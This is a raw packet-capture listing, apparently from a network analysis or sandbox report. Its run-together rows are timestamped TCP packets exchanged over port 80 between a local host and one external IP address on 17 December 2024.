                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024178982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024260998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.024355888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025106907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025270939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.025368929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026017904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026084900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.026184082 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027031898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027127981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027215004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027903080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.027966976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028135061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028853893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.028974056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029243946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029798031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.029973984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030227900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030797958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030872107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.030978918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.031755924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.031886101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032002926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032672882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032783031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.032891035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033611059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033768892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.033868074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034605980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034634113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.034877062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035537004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035629988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.035722017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036511898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036545992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.036639929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037523031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037686110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.037776947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038615942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038801908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.038908005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039850950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039896965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.039999008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040597916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040718079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.040819883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041344881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041409969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.041512012 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.042210102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.042290926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.042388916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.043134928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.043190956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.043291092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.044109106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.044152975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.044239998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.045099020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.045185089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.045285940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.046046019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.046139956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.046242952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.047034025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.047182083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.047291040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.047945976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.047983885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.048115969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.049016953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.049022913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.049145937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.050607920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.050666094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.050765038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.051330090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.051440954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.051548958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052016973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052336931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052567959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052815914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052875996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.052984953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.053627968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.053684950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.053808928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.054629087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.054691076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.054784060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.055532932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.055605888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.055697918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.056636095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.056649923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.056754112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.057460070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.057518005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.057616949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.058581114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.058674097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.058762074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.059355974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.059443951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.059534073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.060251951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.060374975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.060467958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.061363935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.061431885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.061517000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.062186956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.062315941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.062408924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.063189030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.063406944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.063499928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.064136982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.064341068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.064429998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.065037966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.065156937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.065253973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.066030025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.066164970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.066262960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.067006111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.067084074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.067174911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.067919970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.068065882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.068161964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.068896055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.069003105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.069097042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.069807053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.069875002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.069979906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.070780993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.070964098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.071058989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.071727991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.071831942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.071924925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.072616100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.113498926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.214868069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.214932919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.215082884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.215281010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.215389013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.215486050 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.216259956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.216355085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.216451883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.217201948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.217315912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.217412949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.218142986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.218189001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.218282938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.219100952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.219177961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.219280005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.220122099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.220249891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.220350981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.221067905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.221180916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.221278906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.221982002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.222048998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.222153902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.222929955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.223000050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.223081112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.223870993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.223958969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224060059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224807978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.224901915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225004911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225797892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225902081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.225996971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226696014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226814985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.226912975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227674007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227822065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.227926016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228666067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228759050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.228862047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229655027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229764938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.229865074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230530977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230644941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.230737925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.231472969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232028961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232124090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232584953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232659101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.232784986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.233402014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.233937979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234031916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234476089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234534979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.234627962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235306025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235480070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.235574007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236262083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236449003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.236548901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237210035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237348080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.237447977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238214016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238272905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.238372087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239090919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239209890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.239303112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240071058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240140915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240236998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.240992069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241041899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241147995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.241972923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.242147923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.242252111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243058920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243235111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243335009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243911028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.243987083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244090080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244853020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.244963884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.245064020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.245853901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246002913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246104002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246727943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246773005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.246867895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247731924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247848988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.247947931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248666048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248687983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.248805046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.249946117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.250219107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.250324965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251072884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251152992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251251936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251744986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251825094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.251924992 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252463102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252533913 CET8049709185.81.68.147192.168.2.8
